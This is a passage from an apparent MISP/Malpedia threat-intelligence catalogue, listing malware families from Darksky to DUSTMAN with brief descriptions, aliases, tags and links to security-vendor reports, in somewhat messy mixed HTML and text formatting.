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<td><a href="https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html">https://zawadidone.nl/2020/10/05/darkside-ransomware-analysis.html</a></td>
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<td><a href="https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/">https://labs.bitdefender.com/2021/01/darkside-ransomware-decryption-tool/</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2020/01/darkside-ransomware-gang-launches-affiliate-program-p-2968">https://id-ransomware.blogspot.com/2020/01/darkside-ransomware-gang-launches-affiliate-program-p-2968</a></td>
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Darksky

DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server.

The tag is: misp-galaxy:malpedia="Darksky"

Darksky is also known as:

Table 1613. Table References
DarkStRat

The tag is: `misp-galaxy:malpedia="DarkStRat"`

DarkStRat is also known as:

Table 1614. Table References

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<td><a href="https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/">https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/</a></td>
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DarkTequila

Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars.

The tag is: `misp-galaxy:malpedia="DarkTequila"`

DarkTequila is also known as:

Table 1615. Table References

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<td><a href="https://securelist.com/dark-tequila-anejo/87528/">https://securelist.com/dark-tequila-anejo/87528/</a></td>
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Darktrack RAT

DtBackdoor

The tag is: `misp-galaxy:malpedia="Darktrack RAT"`

Darktrack RAT is also known as:

Table 1616. Table References

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Daserf

The tag is: misp-galaxy:malpedia="Daserf"

Daserf is also known as:

- Muirim
- Nioupale

Table 1617. Table References

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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-butler">https://www.secureworks.com/research/threat-profiles/bronze-butler</a></td>
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<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
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<tr>
<td><a href="https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/">https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/</a></td>
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Datper

The tag is: misp-galaxy:malpedia="Datper"

Datper is also known as:

Table 1618. Table References

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<td><a href="https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses">https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses</a></td>
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**DBatLoader**

This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.

The tag is: *misp-galaxy:malpedia=“DBatLoader”*

**Table 1619. Table References**

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<td><a href="https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/">https://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/</a></td>
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**DCRat**

DCRat is a typical RAT that has been around since at least June 2019.

The tag is: *misp-galaxy:malpedia=“DCRat”*

**Table 1620. Table References**

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<td><a href="https://tconbre.blogspot.com/2019/10/dcrat-malware-ebades-sandbox-that-use.html">https://tconbre.blogspot.com/2019/10/dcrat-malware-ebades-sandbox-that-use.html</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html">https://www.fireeye.com/blog/threat-research/2020/05/analyzing-dark-crystal-rat-backdoor.html</a></td>
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**DDKeylogger**

The tag is: *misp-galaxy:malpedia=*DDKeylogger*

DDKeylogger is also known as:

*Table 1621. Table References*

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<td><a href="https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators">https://www.secureworks.com/research/analysis-of-dhs-nccic-indicators</a></td>
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**DDKONG**

The tag is: *misp-galaxy:malpedia=*DDKONG*

DDKONG is also known as:

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<td><a href="https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/">https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-overbrook">https://www.secureworks.com/research/threat-profiles/bronze-overbrook</a></td>
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**DeathRansom**

Also known as Wacatac ransomware due to its .wctc extension.

The tag is: *misp-galaxy:malpedia=*DeathRansom*

DeathRansom is also known as:

- deathransom
- wacatac

*Table 1623. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.deathransom</a></td>
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Decebal

The tag is: misp-galaxy:malpedia="Decebal"

Decebal is also known as:

Table 1624. Table References

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</table>

Defray

Defray is ransomware that appeared in 2017, and is targeted ransomware, mainly on the healthcare vertical.

The distribution of Defray has several notable characteristics: According to Proofpoint: ”Defray is currently being spread via Microsoft Word document attachments in email The campaigns are as small as several messages each The lures are custom crafted to appeal to the intended set of potential victims The recipients are individuals or distribution lists, e.g., group@ and websupport@ Geographic targeting is in the UK and US Vertical targeting varies by campaign and is narrow and selective “

The tag is: misp-galaxy:malpedia="Defray"

Defray is also known as:

• Glushkov

Table 1625. Table References

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<td><a href="https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3">https://unit42.paloaltonetworks.com/vatet-pyxie-defray777/3</a></td>
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Delta(Alfa, Bravo, …)

The tag is: misp-galaxy:malpedia="Delta(Alfa, Bravo, ...)"

Delta(Alfa, Bravo, ...) is also known as:

Table 1626. Table References

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</table>

Dented

Dented is a banking bot written in C. It supports IE, Firefox, Chrome, Opera and Edge and comes with a simple POS grabber. Due to its modularity, reverse socks 5, tor and vnc can be added.

The tag is: misp-galaxy:malpedia="Dented"

Dented is also known as:

Table 1627. Table References

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</table>
**Deprimon**

According to ESET Research, DePriMon is a malicious downloader, with several stages and using many non-traditional techniques. To achieve persistence, the malware registers a new local port monitor – a trick falling under the “Port Monitors” technique in the MITRE ATT&CK knowledgebase. For that, the malware uses the “Windows Default Print Monitor” name; that’s why we have named it DePriMon. Due to its complexity and modular architecture, researcher believe it to be a framework.

DePriMon has been active since at least March 2017. DePriMon was detected in a private company, based in Central Europe, and at dozens of computers in the Middle East.

The tag is: `misp-galaxy:malpedia=“Deprimon”`

Deprimon is also known as:

*Table 1628. Table References*

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**DeputyDog**

The tag is: `misp-galaxy:malpedia=“DeputyDog”`

DeputyDog is also known as:

*Table 1629. Table References*

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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-keystone">https://www.secureworks.com/research/threat-profiles/bronze-keystone</a></td>
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**DeriaLock**

The tag is: `misp-galaxy:malpedia=“DeriaLock”`

DeriaLock is also known as:

*Table 1630. Table References*

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**DeroHE**

DeroHE is a ransomware that was spread to users after IObit, a Windows utility developer, was hacked. The malware is delivered a DLL that is sideloaded by a legitimate, signed IObit License Manager application.

The tag is: `misp-galaxy:malpedia="DeroHE"`

DeroHE is also known as:

*Table 1631. Table References*

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</table>

**Derusbi**

A DLL backdoor also reported publicly as "Derusbi", capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.

The tag is: `misp-galaxy:malpedia="Derusbi"`

Derusbi is also known as:

* PHOTO

*Table 1632. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi">https://malpedia.caad.fkie.fraunhofer.de/details/win.derusbi</a></td>
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<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-mohawk">https://www.secureworks.com/research/threat-profiles/bronze-mohawk</a></td>
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<td><a href="https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/">https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/</a></td>
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Devil’s Rat

The tag is: misp-galaxy:malpedia="Devil’s Rat"

Devil’s Rat is also known as:

Table 1633. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.devils_rat</a></td>
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Dexbia

The tag is: misp-galaxy:malpedia="Dexbia"

Dexbia is also known as:

• CONIME

Table 1634. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia">https://malpedia.caad.fkie.fraunhofer.de/details/win.dexbia</a></td>
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</table>

Dexphot

Dexphot is a cryptominer Malware attacking windows machines to gain profit from their resources.
It implements many techniques to evade common security systems and a file-less technology to become inject malicious behavior. According to Microsoft the Dexphot It hijacked legitimate system processes to disguise malicious activity. If not stopped, Dexphot is equipped by monitoring services and scheduled tasks triggering re-infection when defenders attempt to remove the malware.

The tag is: misp-galaxy:malpedia="Dexphot"

Dexphot is also known as:

Table 1635. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot">https://malpedia.caad.fkie.fraunhofer.de/details/win.dexphot</a></td>
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**Dexter**

The tag is: misp-galaxy:malpedia="Dexter"

Dexter is also known as:

- LusyPOS

Table 1636. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter">https://malpedia.caad.fkie.fraunhofer.de/details/win.dexter</a></td>
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<td><a href="https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html">https://securitykitten.github.io/2014/12/01/lusypos-and-tor.html</a></td>
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<tr>
<td><a href="http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html">http://contagiodump.blogspot.com/2012/12/dexter-pos-infostealer-samples-and.html</a></td>
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<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/">https://blog.trendmicro.com/trendlabs-security-intelligence/infostealer-dexter-targets-checkout-systems/</a></td>
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<tr>
<td><a href="https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html">https://volatility-labs.blogspot.com/2012/12/unpacking-dexter-pos-memory-dump.html</a></td>
</tr>
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</table>

**Dharma**

According to MalwareBytes, the Dharma Ransomware family is installed manually by attackers hacking into computers over Remote Desktop Protocol Services (RDP). The attackers will scan the Internet for computers running RDP, usually on TCP port 3389, and then attempt to brute force the password for the computer.

Once they gain access to the computer they will install the ransomware and let it encrypt the computer. If the attackers are able to encrypt other computers on the network, they will attempt to do so as well.
Dharma is also known as:

- Arena
- Crysis
- Wadhrama
- ncov

Table 1637. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma">https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
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<td><a href="https://www.group-ib.com/media/iran-cybercriminals/">https://www.group-ib.com/media/iran-cybercriminals/</a></td>
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<td><a href="https://www.youtube.com/watch?v=LUxOcp1Rxmg">https://www.youtube.com/watch?v=LUxOcp1Rxmg</a></td>
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<td><a href="https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/">https://thedfirreport.com/2020/06/16/the-little-ransomware-that-couldnt-dharma/</a></td>
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<td><a href="https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/">https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/</a></td>
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DiamondFox

The tag is: misp-galaxy:malpedia="DiamondFox"

DiamondFox is also known as:

- Crystal
**Gorynch**

**Gorynych**

*Table 1638. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox">https://malpedia.caad.fkie.fraunhofer.de/details/win.diamondfox</a></td>
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<td><a href="https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/">https://blog.malwarebytes.com/threat-analysis/2017/03/diamond-fox-p1/</a></td>
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<td><a href="https://blog.cylance.com/a-study-in-bots-diamondfox">https://blog.cylance.com/a-study-in-bots-diamondfox</a></td>
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<tr>
<td><a href="https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced">https://fr3d.hk/blog/diamondfox-bank-robbers-will-be-replaced</a></td>
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**DILLJUICE**

APT10’s fork of the (open-source) Quasar RAT.

The tag is: `misp-galaxy:malpedia=“DILLJUICE”`

DILLJUICE is also known as:

*Table 1639. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice">https://malpedia.caad.fkie.fraunhofer.de/details/win.dilljuice</a></td>
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**Dimnie**

The tag is: `misp-galaxy:malpedia=“Dimnie”`

Dimnie is also known as:

*Table 1640. Table References*

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**DirCrypt**

The tag is: `misp-galaxy:malpedia=“DirCrypt”`

DirCrypt is also known as:
DispCashBR

The tag is: misp-galaxy:malpedia="DispCashBR"

DispCashBR is also known as:

DispenserXFS

The tag is: misp-galaxy:malpedia="DispenserXFS"

DispenserXFS is also known as:

DistTrack

The tag is: misp-galaxy:malpedia="DistTrack"

DistTrack is also known as:

  • Shamoon
Divergent

The tag is: misp-galaxy:malpedia="Divergent"

Divergent is also known as:

- Novter

Table 1645. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.divergent
Diztakun

The tag is: misp-galaxy:malpedia="Diztakun"

Diztakun is also known as:

Table 1646. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.diztakun


DMA Locker

The tag is: misp-galaxy:malpedia="DMA Locker"

DMA Locker is also known as:

Table 1647. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.dma_locker

https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-strikes-back/

https://blog.malwarebytes.com/threat-analysis/2016/02/dma-locker-a-new-ransomware-but-no-reason-to-panic/

https://blog.malwarebytes.com/threat-analysis/2016/05/dma-locker-4-0-known-ransomware-preparing-for-a-massive-distribution/

DMSniff

DMSniff is a point-of-sale malware previously only privately sold. It has been used in breaches of small- and medium-sized businesses in the restaurant and entertainment industries. It uses a domain generation algorithm (DGA) to create lists of command-and-control domains on the fly.

The tag is: misp-galaxy:malpedia="DMSniff"
DMSniff is also known as:

Table 1648. Table References

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**DneSpy**

DneSpy collects information, takes screenshots, and downloads and executes the latest version of other malicious components in the infected system. The malware is designed to receive a “policy” file in JSON format with all the commands to execute. The policy file sent by the C&C server can be changed and updated over time, making dneSpy flexible and well-designed. The output of each executed command is zipped, encrypted, and exfiltrated to the C&C server. These characteristics make dneSpy a fully functional espionage backdoor.

The tag is: `misp-galaxy:malpedia="DneSpy"`

DneSpy is also known as:

Table 1649. Table References

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**DNSChanger**

The tag is: `misp-galaxy:malpedia="DNSChanger"`

DNSChanger is also known as:

Table 1650. Table References

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</table>

**DNSMessenger**

DNSMessenger makes use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker.
The tag is: misp-galaxy:malpedia="DNSMessenger"

DNSMessenger is also known as:

- TEXTMATE

Table 1651. Table References

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<td><a href="http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/">http://wraithhacker.com/2017/10/11/more-info-on-evolved-dnsmessenger/</a></td>
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<td><a href="https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html">https://blog.talosintelligence.com/2017/10/dnsmessenger-sec-campaign.html</a></td>
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<td><a href="https://blog.talosintelligence.com/2017/03/dnsmessenger.html">https://blog.talosintelligence.com/2017/03/dnsmessenger.html</a></td>
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DNSpionage

The tag is: misp-galaxy:malpedia="DNSpionage"

DNSpionage is also known as:

- Agent Drable
- AgentDrable
- Webmask

Table 1652. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage">https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage</a></td>
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<td><a href="https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/">https://blog-cert.opmd.fr/dnspionage-focus-on-internal-actions/</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/cobalt-edgewater">https://www.secureworks.com/research/threat-profiles/cobalt-edgewater</a></td>
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<td><a href="https://marcoramilli.com/2019/04/23/apt34-webmask-project/">https://marcoramilli.com/2019/04/23/apt34-webmask-project/</a></td>
</tr>
</tbody>
</table>
DogHousePower

DogHousePower is a PyInstaller-based ransomware targeting web and database servers. It is delivered through a PowerShell downloader and was hosted on Github.

The tag is: `misp-galaxy:malpedia="DogHousePower"`

DogHousePower is also known as:

* Shelma

**Table 1653. Table References**

**Links**

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower](https://malpedia.caad.fkie.fraunhofer.de/details/win.doghousepower)

Donut Injector

The tag is: `misp-galaxy:malpedia="donut_injector"`

Donut Injector is also known as:

**Table 1654. Table References**

**Links**

- [https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector](https://malpedia.caad.fkie.fraunhofer.de/details/win.donut_injector)

DoppelPaymer

DoppelPaymer is a ransomware family that encrypts user data and later on it asks for a ransom in order to restore original files. It is recognizable by its trademark file extension added to encrypted files: .doppeled. It also creates a note file named: ".how2decrypt.txt".

The tag is: `misp-galaxy:malpedia="DoppelPaymer"`

DoppelPaymer is also known as:

**Table 1655. Table References**

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<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<td><a href="https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/">https://www.zdnet.com/article/ransomware-gang-says-it-breached-one-of-nasas-it-contractors/</a></td>
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<td><a href="https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/">https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html">https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html</a></td>
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NgrBot

The tag is: misc-galaxy:malpedia="NgrBot"

NgrBot is also known as:

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<td><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/">https://blog.trendmicro.com/trendlabs-security-intelligence/the-dorkbot-rises/</a></td>
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<td><a href="https://research.checkpoint.com/dorkbot-an-investigation/">https://research.checkpoint.com/dorkbot-an-investigation/</a></td>
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Dorshel

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Dorshel is also known as:

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Dot Ransomware

The tag is: misp-galaxy:malpedia=“Dot Ransomware”

Dot Ransomware is also known as:

• MZP Ransomware

Table 1658. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware">https://malpedia.caad.fkie.fraunhofer.de/details/win.dot_ransomware</a></td>
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DoubleFantasy (Windows)

The tag is: misp-galaxy:malpedia=“DoubleFantasy (Windows)”

DoubleFantasy (Windows) is also known as:

• VALIDATOR

Table 1659. Table References

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<td><a href="https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/">https://fmnagisa.wordpress.com/2020/08/27/revisiting-equationgroups-fanny-worm-or-dementiawheel/</a></td>
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<td><a href="https://twitter.com/Int2e_/status/1294565186939092994">https://twitter.com/Int2e_/status/1294565186939092994</a></td>
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DoublePulsar

The tag is: misp-galaxy:malpedia=“DoublePulsar”

DoublePulsar is also known as:

Table 1660. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar">https://malpedia.caad.fkie.fraunhofer.de/details/win.doublepulsar</a></td>
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<td><a href="https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit">https://www.symantec.com/blogs/threat-intelligence/buckeye-windows-zero-day-exploit</a></td>
</tr>
<tr>
<td><a href="https://github.com/countercept/doublepulsar-c2-traffic-decryptor">https://github.com/countercept/doublepulsar-c2-traffic-decryptor</a></td>
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Downdelph

The tag is: misp-galaxy:malpedia="Downdelph"

Downdelph is also known as:

- DELPHACY

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<td><a href="https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html">https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html</a></td>
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<td><a href="https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection">https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection</a></td>
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Downeks

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Downeks is also known as:

Table 1662. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks">https://malpedia.caad.fkie.fraunhofer.de/details/win.downeks</a></td>
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<tr>
<td><a href="https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/">https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/</a></td>
</tr>
</tbody>
</table>

DownPaper

DownPaper, sometimes delivered as sami.exe, is a Backdoor trojan. Its main functionality is to download and run a second stage. This malware has been observed in campaigns involving Charming Kitten, an Iranian cyberespionage group.

The tag is: misp-galaxy:malpedia="DownPaper"

DownPaper is also known as:

Table 1663. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper">https://malpedia.caad.fkie.fraunhofer.de/details/win.downpaper</a></td>
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</table>
**Downrage**

simple tool to facilitate download and persistence of a next-stage tool; collects system information and metadata probably in an attempt to tell sandbox-environments apart from real targets on the server-side; uses domains of search engines like Google to check for Internet connectivity; XOR-based string obfuscation with a 16-byte key

The tag is: `misp-galaxy:malpedia="Downrage"`

Downrage is also known as:

- GAMEFISH

Table 1664. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage">https://malpedia.caad.fkie.fraunhofer.de/details/win.downrage</a></td>
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<tr>
<td><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></td>
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**DramNudge**

The tag is: `misp-galaxy:malpedia="DramNudge"`

DramNudge is also known as:

Table 1665. Table References

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**DRATzarus**

The tag is: `misp-galaxy:malpedia="DRATzarus"`

DRATzarus is also known as:

Table 1666. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus">https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus</a></td>
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DreamBot

2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) 2014 Dreambot (Gozi ISFB variant)

In 2014, a variant of Gozi ISFB was developed. Mainly, the dropper performs additional anti-vm checks (vmware, vbox, qemu), while the actual bot-dll remains unchanged in most parts. New functionality, such as TOR support, was added though and often, the Fluxxy fast-flux network is used.

See win.gozi for additional historical information.

The tag is: misp-galaxy:malpedia="DreamBot"

DreamBot is also known as:

Table 1667. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot">https://malpedia.caad.fkie.fraunhofer.de/details/win.dreambot</a></td>
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</table>
| https://www.youtube.com/watch?v=EyDiIAt[
| https://lokalhost.pl/gozi_tree.txt |
| https://community.riskiq.com/article/30f22a00 |

Dridex

OxCERT blog describes Dridex as "an evasive, information-stealing malware variant; its goal is to acquire as many credentials as possible and return them via an encrypted tunnel to a Command-and-Control (C&C) server. These C&C servers are numerous and scattered all over the Internet, if the malware cannot reach one server it will try another. For this reason, network-based measures such as blocking the C&C IPs is effective only in the short-term." According to MalwareBytes, "Dridex uses an older tactic of infection by attaching a Word document that utilizes macros to install malware. However, once new versions of Microsoft Office came out and users generally updated, such a threat subsided because it was no longer simple to infect a user with this method." IBM X-Force discovered "a new version of the Dridex banking Trojan that takes advantage of a code injection technique called AtomBombing to infect systems. AtomBombing is a technique for injecting malicious code into the 'atom tables' that almost all versions of Windows uses to store certain application data. It is a variation of typical code injection attacks that take advantage of
input validation errors to insert and to execute malicious code in a legitimate process or application. Dridex v4 is the first malware that uses the AtomBombing process to try and infect systems."

The tag is: *misp-galaxy:malpedia*="Dridex"

Dridex is also known as:

**Table 1668. Table References**

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<td><a href="https://adalogics.com/blog/the-state-of-advanced-code-injections">https://adalogics.com/blog/the-state-of-advanced-code-injections</a></td>
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<td><a href="https://securityintelligence.com/dridexs-cold-war-enter-atombombing/">https://securityintelligence.com/dridexs-cold-war-enter-atombombing/</a></td>
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<td><a href="https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/">https://research.checkpoint.com/2021/stopping-serial-killer-catching-the-next-strike/</a></td>
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<td><a href="https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction">https://www.appgate.com/blog/reverse-engineering-dridex-and-automating-ioc-extraction</a></td>
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<td><a href="https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt">https://github.com/pan-unit42/tweets/blob/master/2020-09-07-Dridex-IOCs.txt</a></td>
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<td><a href="https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf">https://cdn2.hubspot.net/hubfs/507516/ANB_MIR_Dridex_PRv7_final.pdf</a></td>
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<tr>
<td><a href="https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf">https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf</a></td>
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DRIFTPIN

Driftpin is a small and simple backdoor that enables the attackers to assess the victim. When executed, the trojan connects to a C&C server and receives commands to grab screenshots, enumerate running processes and get information about the system and campaign ID.

The tag is: `misp-galaxy:malpedia="DRIFTPIN"`

DRIFTPIN is also known as:

- Spy.Agent.ORM
- Toshliph

Table 1669. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin">https://malpedia.caad.fkie.fraunhofer.de/details/win.driftpin</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-niagara">https://www.secureworks.com/research/threat-profiles/gold-niagara</a></td>
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<td><a href="https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html">https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html</a></td>
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Dripion

The tag is: `misp-galaxy:malpedia="Dripion"`

Dripion is also known as:

- Masson

Table 1670. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion">https://malpedia.caad.fkie.fraunhofer.de/details/win.dripion</a></td>
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</table>
DriveOcean

Communicates via Google Drive.

The tag is: `misp-galaxy:malpedia="DriveOcean"`

DriveOcean is also known as:

- Google Drive RAT

Table 1671. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean">https://malpedia.caad.fkie.fraunhofer.de/details/win.driveocean</a></td>
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</table>

DropBook

DropBook is a backdoor developed by the Molerats group and first appeared in late 2020. The backdoor abuses Facebook and Dropbox platforms for C2 purposes, where fake Facebook accounts are used by the operators to control the backdoor by posting commands on the accounts.

The tag is: `misp-galaxy:malpedia="DropBook"`

DropBook is also known as:

Table 1672. Table References

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DROPSHOT

The tag is: `misp-galaxy:malpedia="DROPSHOT"`

DROPSHOT is also known as:

Table 1673. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot">https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot</a></td>
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</table>
Dtrack

Dtrack is a Remote Administration Tool (RAT) developed by the Lazarus group. Its core functionality includes operations to upload a file to the victim’s computer, download a file from the victim’s computer, dump disk volume data, persistence and more.

A variant of Dtrack was found on Kudankulam Nuclear Power Plant (KNPP) which was used for a targeted attack.

The tag is: `misp-galaxy:malpedia="Dtrack"`

Dtrack is also known as:

Table 1674. Table References

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<td><a href="https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/">https://www.cyberbit.com/dtrack-apt-malware-found-in-nuclear-power-plant/</a></td>
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<td><a href="https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md">https://github.com/jeFF0Falltrades/IoCs/blob/master/APT/dtrack_lazarus_group.md</a></td>
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<td><a href="https://securelist.com/apt-trends-report-q3-2020/99204/">https://securelist.com/apt-trends-report-q3-2020/99204/</a></td>
</tr>
<tr>
<td><a href="https://blog.macnica.net/blog/2020/11/dtrack.html">https://blog.macnica.net/blog/2020/11/dtrack.html</a></td>
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DualToy (Windows)

The tag is: `misp-galaxy:malpedia="DualToy (Windows)"

DualToy (Windows) is also known as:

Table 1675. Table References
Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dualtoy

DarkHotel

The tag is: misp-galaxy:malpedia="DarkHotel"

DarkHotel is also known as:

Table 1676. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dubnium_darkhotel
http://blog.jpcert.or.jp/2016/06/asruex-malware-infecting-through-shortcut-files.html

DUBrute

The tag is: misp-galaxy:malpedia="DUBrute"

DUBrute is also known as:

Table 1677. Table References

Links
https://malpedia.caad.fkie.fraunhofer.de/details/win.dubrute
https://github.com/ch0sys/DUBrute

Dumador

The tag is: misp-galaxy:malpedia="Dumador"

Dumador is also known as:

Table 1678. Table References

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https://malpedia.caad.fkie.fraunhofer.de/details/win.dumador
**DuQu**

The tag is: *misp-galaxy:malpedia="DuQu"*

DuQu is also known as:

*Table 1679. Table References*

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu">https://malpedia.caad.fkie.fraunhofer.de/details/win.duqu</a></td>
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</table>

**DUSTMAN**

